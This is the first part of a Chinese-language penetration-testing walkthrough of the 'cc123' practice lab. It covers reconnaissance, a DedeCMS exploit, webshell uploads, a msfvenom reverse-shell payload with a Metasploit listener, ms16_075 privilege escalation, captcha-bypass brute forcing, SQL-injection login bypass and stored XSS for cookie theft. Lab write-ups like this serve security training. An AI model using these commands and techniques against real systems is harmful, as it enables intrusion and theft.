零基础‘自外网到内网’渗透过程详细记录(cc123靶场)—

一、网络环境示意图

二、环境搭建

首先将三个虚拟机使用VMware打开。

接下来对虚拟机进行配置。

首先配置虚拟机“护卫神主机大师(项目四)”。

点击编辑虚拟机设置。

发现存在两个网卡。

打开虚拟网络编辑器。

点击更改设置。

点击添加网络。

选择VM19后点击确定。

根据网络示意图，配置VM19，将其子网ip配置为：10.10.10.0，然后点击确定将配置保存。

根据网络示意图，用同样打方法添加VM18。

将其子网ip配置为：10.10.1.0，然后点击确定将配置保存。

将虚拟机“护卫神主机大师(项目四)”启动。点击“我已复制虚拟机”。

成功启动如下图所示。

接下来启动“SQL2008数据库(项目四)”。

成功启动如下图所示。

启动“目标机子(项目四)”。

成功启动如下图所示。

分别检查三台虚拟机的ip并测试连通性。

三、初步信息收集

启动kali。

创建“cc123”文件夹，方便后期存储。

扫描主机。

netdiscover -i eth0 -r 192.168.10.0/24

扫描到目标主机：192.168.10.134。

扫描主机的第二种方法。

nmap -sn 192.168.10.0/24

同样扫描到目标主机。

扫描前面发现的主机的端口。

masscan -p 1-65535 192.168.10.134 --rate=1000

使用nmap对上面扫描得到的端口进行详细的信息收集。

nmap -sC -A 192.168.10.134 -p 80,53,49154,6588,3389,135,21,51464,999 -oA cc123-port

发现80端口，尝试进行访问。

打开本地host文件进行域名绑定，加入ip及对应域名后保存文件。

文件路径：C:\Windows\System32\drivers\etc\hostsip及对应域名：192.168.10.134 www.cc123.com

绑定后访问域名。

域名：www.cc123.com

发现999端口，尝试进行访问，发现是phpadmin。

发现6588端口，尝试进行访问，发现是主机大师。

进入“护卫神主机大师(项目四)”，点击管理面板->DNS，进行域名绑定。

右键后点击新建主机。

输入ip地址后点击添加主机即可。

前面kali内发现53端口，想到其可能存在DNS服务。

设置本地机网关。

DNS：192.168.10.134

此时就可以将前面绑定的域名删除，删除后再次将hosts文件保存。

ping网址www.cc123.com进行验证，可以看到指向的ip仍未192.168.10.134。

打开kali的resolv.conf文件进行域名绑定。

打开配置文件，将其修改为：192.168.10.134。

vi /etc/resolv.conf

修改后保存。

wq!

接下来扫描服务器看其是否存在子域名。

wfuzz -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt -u cc123.com -H "Host:FUZZ.cc123.com" --hw 53

对上面的扫描到的子域名依次进行访问。

至此可以得到子域名包括如下：

http://www.cc123.com
http://ww2.cc123.com
http://new.cc123.com

四、http://new.cc123.com漏洞发现

接下里对扫描到的域名进行漏洞检测。

首先检测http://new.cc123.com。

根据其图标，发现其是织梦的cms。

查看其版本号。

http://new.cc123.com/data/admin/ver.txt

得到其版本为20150618，此版本存在漏洞。

接下来尝试访问其后台。

http://new.cc123.com/dede

尝试使用默认密码进行登录，但是登录失败了，因此尝试注册一个账号。

http://new.cc123.com/member

输入信息后点击注册。

直接点击完成注册。

注册完成。

从网页内获取cookie，将cookie填入到cookies.txt内。

点击系统设置，分类管理，添加分类。

成功添加分类。

利用exp跑出密码并解密，得到密码为：admin7788。

得到密码后重新来到后台，输入账号密码后点击登录。

发现成功登录到了后台。

点击文件式管理->根目录。

进入目录“a”。

点击文件上传。

选择木马文件并上传。

上传成功。

此时就可以访问到了。

五、利用蚁剑连接webshell

接下来使用蚁剑连接。

双击exe文件打开后进行初始化。

选择文件夹进行初始化。

初始化完成后即可打开工具。

右键后点击添加数据。

输入地址和密码后点击测试连接。

下图所示连接成功。

此时点击“添加”即可。

点击文件管理即可看到网站的整个目录。

效果如下图所示。

六、第一层Web服务器提权

.net文件权限比.php文件权限大，因此向“a”目录上传.net文件。

上传之后就可以进行访问了，密码为：admin。

测试可以执行cmd命令。

因此就可以上传一个攻击载荷进行操作。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.132 lport=12345 -f exe >s.exe

从kali内访问。

http://new.cc123.com/a/ASPXSpy2014.aspx

访问后找到c盘下的$Recycle.Bin文件夹上传文件。

将刚刚生成的exe文件尝试进行上传。

但是提示访问被拒绝。

所以上传wt.asp文件进行解决，其可以扫描可写目录。

上传成功。

成功上传后进行访问。

http://new.cc123.com/a/wt.asp

点击开始扫描。

根据扫描的结果，我们尝试上传到c:\windows\debug\WIA\路径下。

c:\windows\debug\WIA\

再次尝试进行上传。

上传成功。

接下来测试其能否执行。

打开msfconsole。

msfconsole

打开成功后利用handler模块设置监听。

use exploit/multi/handler

设置payload。

set payload windows/meterpreter/reverse_tcp

设置本地ip。

set lhost 192.168.10.132

设置监听端口。

set lport 12345

查看配置。

show options

执行exploit命令开始监听。

命令：exploit

开始监听后，执行前面上传的s.exe文件，输入路径后点击Submit。

/c c:\windows\debug\WIA\s.exe

根据浏览器正在加载判断已经开始执行了。

此时可以看到成功监听到了。

查看ip。

ipconfig

查看uid。

getuid

可以看到当前权限是普通权限，因此接下来要进行提权操作。

执行命令退出。

background

利用local_exploit_suggester模块查找本地是否存在提权漏洞。

use post/multi/recon/local_exploit_suggester

设置session。

set session 1

开始执行。

run

利用扫描到的exploit/windows/local/ms16_075_reflection_juicy提权。

use exploit/windows/local/ms16_075_reflection_juicy

查看所需配置。

show options

设置session。

set SESSION 1

开始执行。

exploit

执行完成后再次查看权限，可以看到此时已经拿到系统权限。

getuid

至此拿到了web服务器系统权限。

七、http://ww2.cc123.com漏洞发现

访问网址，获取其响应头信息。

http://ww2.cc123.com

可以获取到一系列信息。

对网站目录进行扫描。

gobuster dir -u http://ww2.cc123.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x 'aspx,html' -o cc123.log

根据扫描结果验证扫描到的文件是否存在。

根据网页内的文本框，可以猜测页面内存在XSS漏洞。

http://ww2.cc123.com/Message.aspx

找到其后台。

http://ww2.cc123.com/admin/Login.aspx

使用burp抓包。

将数据包发送到repeater。

进入到repeater后点击send放包。

右键后选择。

点击copy复制。

关闭代理后访问复制到的内容，重复访问后发现验证码可以重用，所以这里存在漏洞，可以尝试密码爆破。

右键数据包后将其发送到intruder。

点击clear。

将密码选中。

点击payloads添加字典。

加入字典本。

加入完成后点击Start attack开始测试。

等待爆破完成后，根据Length的不同即可成功获取到密码。

接下来尝试是否存在注入漏洞。

在用户名后面添加引号后放包，观察有无报错。

复制地址。

复制后到浏览器访问。

回到burp内尝试将用户名后面的部分注释掉，发现其进行了302跳转，由此猜测其可能存在注入。

可以看到其跳转到了后台。

用同样的方法复制地址后尝试访问，发现成功进入到后台内。

从后台可以看到还存在两个账号，但是看不到密码。

可以看到后台内存在留言功能，因此猜测是否存在XSS漏洞。

下面进行漏洞验证。

访问开始的时候扫描到的留言页面。

尝试是否存在XSS，输入完成后点击提交。

来到后台内查看。

选中后右键查看源代码。

可以看到确实存在XSS漏洞。

输入弹窗语句再次进行尝试。

再次进入到后台进行查看，发现成功弹窗。

因此就可以通过在前台留言内插入XSS代码，当管理员查看后就可以拿到管理员的cookie，进而可以实现登录后台。

继续观察后台，发现文件上传功能。

抓取数据包，看到可以修改文件名。

将数据包发送到repeater后，把文件名后缀修改成aspx放包进行尝试，发现其存在白名单验证。

因此想要通过文件上传的方式上传木马很难，所以思考有没有别的注入方式。

细节较多，篇幅较大，分为上/下两部分发布在两篇文章内

另一部分详见下面文章

零基础‘自外网到内网’渗透过程详细记录(cc123靶场)——下https://blog.csdn.net/weixin_62808713/article/details/143575815